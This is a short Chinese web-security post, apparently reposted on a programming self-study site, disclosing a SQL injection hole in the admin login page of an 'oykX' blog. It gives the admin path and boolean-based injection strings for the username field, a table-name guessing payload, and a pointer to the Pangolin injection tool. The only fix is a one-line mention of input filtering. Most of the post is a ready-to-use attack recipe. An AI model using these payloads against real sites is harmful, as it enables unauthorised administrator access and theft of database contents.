进入http://HdhCmsTest2cto测试数据 /admin/index.aspx 在帐号输入框处填123' or 1=1 and '1'='1 密码为空(也可以乱填),点击Login 提示密码错误 把帐号输入框语句换成123' or 1=2 and '1'='1提示用户不存在,注射漏洞由此产生了 后面猜表名:123' or (select count(*)from 表名)>0 也可以抓包注射丢进穿山甲 http://expsec测试数据版权所有!转载请注明出处 HdhCmsTest2cto测试数据 提供修复方案: 过滤输入框输入
查看更多关于oykX博客后台post注射0day及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12556